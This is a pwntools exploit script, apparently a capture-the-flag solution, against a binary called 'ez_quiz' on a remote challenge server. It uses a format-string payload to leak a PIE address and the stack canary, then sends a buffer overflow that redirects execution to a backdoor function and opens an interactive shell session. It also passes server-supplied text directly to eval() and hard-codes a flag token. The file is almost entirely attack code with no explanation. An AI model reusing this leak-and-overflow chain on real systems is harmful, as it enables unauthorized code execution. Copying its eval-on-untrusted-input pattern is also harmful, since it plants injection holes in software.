1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58
| from pwn import * from pwn import p8,p16,p32,p64,u32,u64 context.arch = 'amd64'
context.terminal = ['gnome-terminal', '-e'] local_file = '/home/feichai/ctf_file/ez_quiz' elf=ELF(local_file) local_libc = elf.libc.path libc=ELF(local_libc, checksec = False)
def start(): if args.GDB: gdbscript = ''' b *$rebase(0x1E71) ''' io = process(local_file) gdb.attach(io, gdbscript) elif args.PROCESS: io = process(local_file) else: io = remote("challenge.qsnctf.com", 30162) return io
def lg(s, addr): return info(f'\033[1;33m{f"{s}-->0x{addr:02x}"}\033[0m')
r = lambda a: io.recv(a) ru = lambda a: io.recvuntil(a,drop=True) s = lambda a: io.send(a) sa = lambda a,b: io.sendafter(a,b) sl = lambda a: io.sendline(a) sla = lambda a,b: io.sendlineafter(a,b)
io = start()
def exp(): sla("Please give me your token:",'DRKCTF{P13@s3_1e@k_thE_addr_0f_7he_cAnARy_@nd_pie}') ru('Right!') ans = eval(ru('=')) sla('?',str(ans))
sla('gift:\n','%13$p%11$p') leak_pie = int(r(14),16) canary = int(r(18),16) lg('leak_pie',leak_pie) lg('canary',canary)
pie_base = leak_pie - 0x2042 backdoor = pie_base + 0x1426 pd = b'a'*(0x30-8)+p64(canary)+p64(1)+p64(backdoor) sl(pd)
io.interactive()
if __name__=='__main__': exp()
|